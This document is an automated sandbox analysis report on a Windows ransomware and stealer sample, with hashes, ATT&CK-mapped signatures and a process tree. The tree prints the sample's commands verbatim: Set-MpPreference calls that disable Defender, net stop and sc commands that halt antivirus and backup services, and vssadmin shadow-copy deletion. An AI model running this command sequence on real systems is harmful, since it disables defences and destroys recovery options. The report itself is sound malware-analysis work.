81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e

Analysis

max time kernel
138s
max time network
131s
platform
windows10_x64
resource
win10v20210410
submitted
26-07-2021 12:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
Size

416KB
MD5

21fa6ebdd397f14bbb68a4e3d012467e
SHA1

0ecff2f818565e7eb28d3a7b7d295459a868e920
SHA256

81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e
SHA512

368e0c8e973f2cf655ea8a69be07b29bc073b2855f6feb9130f5fa8569cfa8d094549ec5d7706c293f8b22ae8bb6ee1b7dd2f4c2d2ccff94e7435e36d966bf66

Score

10^/10

evasion ransomware spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Disables Task Manager via registry modification
evasion

Modifies extensions of user files 1 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File created	C:\Users\Admin\Pictures\UpdateComplete.png.builder	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Enumerates connected drives 3 TTPs 18 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
4928	vssadmin.exe
4524	vssadmin.exe
3820	vssadmin.exe
4884	vssadmin.exe
3980	vssadmin.exe
2212	vssadmin.exe
4576	vssadmin.exe
2948	vssadmin.exe
3264	vssadmin.exe
4428	vssadmin.exe
3664	vssadmin.exe
2832	vssadmin.exe
4852	vssadmin.exe
3096	vssadmin.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
4128	taskkill.exe
4648	taskkill.exe
4764	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1432	powershell.exe
1432	powershell.exe
1432	powershell.exe
3080	powershell.exe
3732	powershell.exe
1908	powershell.exe
3080	powershell.exe
3876	powershell.exe
3876	powershell.exe
1928	powershell.exe
1928	powershell.exe
192	powershell.exe
192	powershell.exe
2688	powershell.exe
2688	powershell.exe
3732	powershell.exe
3732	powershell.exe
3080	powershell.exe
3080	powershell.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
4164	powershell.exe
4164	powershell.exe
2788	powershell.exe
2788	powershell.exe
4280	powershell.exe
4280	powershell.exe
4424	powershell.exe
4424	powershell.exe
1908	powershell.exe
1908	powershell.exe
3876	powershell.exe
3876	powershell.exe
3732	powershell.exe
4548	powershell.exe
4548	powershell.exe
1928	powershell.exe
1928	powershell.exe
192	powershell.exe
192	powershell.exe
2788	powershell.exe
2688	powershell.exe
1908	powershell.exe
4164	powershell.exe
3876	powershell.exe
4280	powershell.exe
4424	powershell.exe
1928	powershell.exe
4548	powershell.exe
192	powershell.exe
2788	powershell.exe
2688	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1432	powershell.exe
Token: SeIncreaseQuotaPrivilege	1432	powershell.exe
Token: SeSecurityPrivilege	1432	powershell.exe
Token: SeTakeOwnershipPrivilege	1432	powershell.exe
Token: SeLoadDriverPrivilege	1432	powershell.exe
Token: SeSystemProfilePrivilege	1432	powershell.exe
Token: SeSystemtimePrivilege	1432	powershell.exe
Token: SeProfSingleProcessPrivilege	1432	powershell.exe
Token: SeIncBasePriorityPrivilege	1432	powershell.exe
Token: SeCreatePagefilePrivilege	1432	powershell.exe
Token: SeBackupPrivilege	1432	powershell.exe
Token: SeRestorePrivilege	1432	powershell.exe
Token: SeShutdownPrivilege	1432	powershell.exe
Token: SeDebugPrivilege	1432	powershell.exe
Token: SeSystemEnvironmentPrivilege	1432	powershell.exe
Token: SeRemoteShutdownPrivilege	1432	powershell.exe
Token: SeUndockPrivilege	1432	powershell.exe
Token: SeManageVolumePrivilege	1432	powershell.exe
Token: 33	1432	powershell.exe
Token: 34	1432	powershell.exe
Token: 35	1432	powershell.exe
Token: 36	1432	powershell.exe
Token: SeDebugPrivilege	3732	powershell.exe
Token: SeDebugPrivilege	3080	powershell.exe
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeDebugPrivilege	3876	powershell.exe
Token: SeDebugPrivilege	1928	powershell.exe
Token: SeDebugPrivilege	192	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
Token: SeDebugPrivilege	2788	powershell.exe
Token: SeDebugPrivilege	4164	powershell.exe
Token: SeDebugPrivilege	4280	powershell.exe
Token: SeDebugPrivilege	4424	powershell.exe
Token: SeDebugPrivilege	4548	powershell.exe
Token: SeIncreaseQuotaPrivilege	3080	powershell.exe
Token: SeSecurityPrivilege	3080	powershell.exe
Token: SeTakeOwnershipPrivilege	3080	powershell.exe
Token: SeLoadDriverPrivilege	3080	powershell.exe
Token: SeSystemProfilePrivilege	3080	powershell.exe
Token: SeSystemtimePrivilege	3080	powershell.exe
Token: SeProfSingleProcessPrivilege	3080	powershell.exe
Token: SeIncBasePriorityPrivilege	3080	powershell.exe
Token: SeCreatePagefilePrivilege	3080	powershell.exe
Token: SeBackupPrivilege	3080	powershell.exe
Token: SeRestorePrivilege	3080	powershell.exe
Token: SeShutdownPrivilege	3080	powershell.exe
Token: SeDebugPrivilege	3080	powershell.exe
Token: SeSystemEnvironmentPrivilege	3080	powershell.exe
Token: SeRemoteShutdownPrivilege	3080	powershell.exe
Token: SeUndockPrivilege	3080	powershell.exe
Token: SeManageVolumePrivilege	3080	powershell.exe
Token: 33	3080	powershell.exe
Token: 34	3080	powershell.exe
Token: 35	3080	powershell.exe
Token: 36	3080	powershell.exe
Token: SeDebugPrivilege	4128	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3732	powershell.exe
Token: SeSecurityPrivilege	3732	powershell.exe
Token: SeTakeOwnershipPrivilege	3732	powershell.exe
Token: SeLoadDriverPrivilege	3732	powershell.exe
Token: SeSystemProfilePrivilege	3732	powershell.exe
Token: SeSystemtimePrivilege	3732	powershell.exe
Token: SeProfSingleProcessPrivilege	3732	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2264 wrote to memory of 1432	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	74
PID 2264 wrote to memory of 1432	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	74
PID 2264 wrote to memory of 3732	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	79
PID 2264 wrote to memory of 3732	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	79
PID 2264 wrote to memory of 3080	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	81
PID 2264 wrote to memory of 3080	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	81
PID 2264 wrote to memory of 1908	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	83
PID 2264 wrote to memory of 1908	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	83
PID 2264 wrote to memory of 3876	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	85
PID 2264 wrote to memory of 3876	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	85
PID 2264 wrote to memory of 1928	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	87
PID 2264 wrote to memory of 1928	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	87
PID 2264 wrote to memory of 192	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	89
PID 2264 wrote to memory of 192	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	89
PID 2264 wrote to memory of 2688	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	91
PID 2264 wrote to memory of 2688	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	91
PID 2264 wrote to memory of 2788	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	93
PID 2264 wrote to memory of 2788	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	93
PID 2264 wrote to memory of 4164	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	95
PID 2264 wrote to memory of 4164	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	95
PID 2264 wrote to memory of 4280	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	97
PID 2264 wrote to memory of 4280	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	97
PID 2264 wrote to memory of 4424	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	99
PID 2264 wrote to memory of 4424	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	99
PID 2264 wrote to memory of 4548	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	101
PID 2264 wrote to memory of 4548	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	101
PID 2264 wrote to memory of 4680	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	103
PID 2264 wrote to memory of 4680	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	103
PID 4680 wrote to memory of 4972	4680	net.exe	105
PID 4680 wrote to memory of 4972	4680	net.exe	105
PID 2264 wrote to memory of 4956	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	106
PID 2264 wrote to memory of 4956	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	106
PID 4956 wrote to memory of 4608	4956	net.exe	128
PID 4956 wrote to memory of 4608	4956	net.exe	128
PID 2264 wrote to memory of 4744	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	109
PID 2264 wrote to memory of 4744	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	109
PID 4744 wrote to memory of 4696	4744	net.exe	140
PID 4744 wrote to memory of 4696	4744	net.exe	140
PID 2264 wrote to memory of 4184	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	112
PID 2264 wrote to memory of 4184	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	112
PID 4184 wrote to memory of 1608	4184	net.exe	114
PID 4184 wrote to memory of 1608	4184	net.exe	114
PID 2264 wrote to memory of 4392	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	115
PID 2264 wrote to memory of 4392	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	115
PID 4392 wrote to memory of 3336	4392	net.exe	117
PID 4392 wrote to memory of 3336	4392	net.exe	117
PID 2264 wrote to memory of 692	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	118
PID 2264 wrote to memory of 692	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	118
PID 2264 wrote to memory of 2960	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	120
PID 2264 wrote to memory of 2960	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	120
PID 2264 wrote to memory of 3332	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	122
PID 2264 wrote to memory of 3332	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	122
PID 2264 wrote to memory of 3920	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	124
PID 2264 wrote to memory of 3920	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	124
PID 2264 wrote to memory of 4128	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	126
PID 2264 wrote to memory of 4128	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	126
PID 2264 wrote to memory of 4648	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	129
PID 2264 wrote to memory of 4648	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	129
PID 2264 wrote to memory of 4764	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	131
PID 2264 wrote to memory of 4764	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	131
PID 2264 wrote to memory of 3820	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	133
PID 2264 wrote to memory of 3820	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	133
PID 2264 wrote to memory of 4576	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	137
PID 2264 wrote to memory of 4576	2264	81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe	137

C:\Users\Admin\AppData\Local\Temp\81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe
"C:\Users\Admin\AppData\Local\Temp\81e81f0bbbdb831eda215033b7a7dbf2eed3812f4e58118f181a8e99e613179e.sample.exe"
1⤵
- Modifies extensions of user files
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2264
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1432
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1908
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1928
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:192
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2688
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2788
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4280
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4424
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4548
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4680
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:4972
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4956
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:4608
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:4696
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4184
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:1608
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4392
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:3336
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:692
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:2960
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:3332
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:3920
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4128
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:4648
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:4764
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:3820
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4576
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:4884
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4696
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:3664
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:4928
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:3980
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:2832
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:4852
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:2948
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:2212
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:4524
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:3096
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:3264
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:4428

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4608

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5116

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/192-194-0x000002734B430000-0x000002734B432000-memory.dmp

Filesize
8KB

Download
memory/192-394-0x000002734B436000-0x000002734B438000-memory.dmp

Filesize
8KB

Download
memory/192-589-0x000002734B438000-0x000002734B439000-memory.dmp

Filesize
4KB

Download
memory/192-197-0x000002734B433000-0x000002734B435000-memory.dmp

Filesize
8KB

Download
memory/1432-128-0x00000227FF080000-0x00000227FF082000-memory.dmp

Filesize
8KB

Download
memory/1432-125-0x00000227FF3E0000-0x00000227FF3E1000-memory.dmp

Filesize
4KB

Download
memory/1432-122-0x00000227FF230000-0x00000227FF231000-memory.dmp

Filesize
4KB

Download
memory/1432-129-0x00000227FF083000-0x00000227FF085000-memory.dmp

Filesize
8KB

Download
memory/1432-130-0x00000227FF086000-0x00000227FF088000-memory.dmp

Filesize
8KB

Download
memory/1908-200-0x00000199DA4A0000-0x00000199DA4A2000-memory.dmp

Filesize
8KB

Download
memory/1908-586-0x00000199DA4A8000-0x00000199DA4A9000-memory.dmp

Filesize
4KB

Download
memory/1908-210-0x00000199DA4A3000-0x00000199DA4A5000-memory.dmp

Filesize
8KB

Download
memory/1908-310-0x00000199DA4A6000-0x00000199DA4A8000-memory.dmp

Filesize
8KB

Download
memory/1928-588-0x000002158E758000-0x000002158E759000-memory.dmp

Filesize
4KB

Download
memory/1928-231-0x000002158E753000-0x000002158E755000-memory.dmp

Filesize
8KB

Download
memory/1928-187-0x000002158E750000-0x000002158E752000-memory.dmp

Filesize
8KB

Download
memory/1928-366-0x000002158E756000-0x000002158E758000-memory.dmp

Filesize
8KB

Download
memory/2264-114-0x0000000000DA0000-0x0000000000DA1000-memory.dmp

Filesize
4KB

Download
memory/2264-117-0x000000001B9B0000-0x000000001B9B2000-memory.dmp

Filesize
8KB

Download
memory/2688-203-0x0000028292920000-0x0000028292922000-memory.dmp

Filesize
8KB

Download
memory/2688-427-0x0000028292926000-0x0000028292928000-memory.dmp

Filesize
8KB

Download
memory/2688-209-0x0000028292923000-0x0000028292925000-memory.dmp

Filesize
8KB

Download
memory/2688-598-0x0000028292928000-0x0000028292929000-memory.dmp

Filesize
4KB

Download
memory/2788-221-0x000001D0E8643000-0x000001D0E8645000-memory.dmp

Filesize
8KB

Download
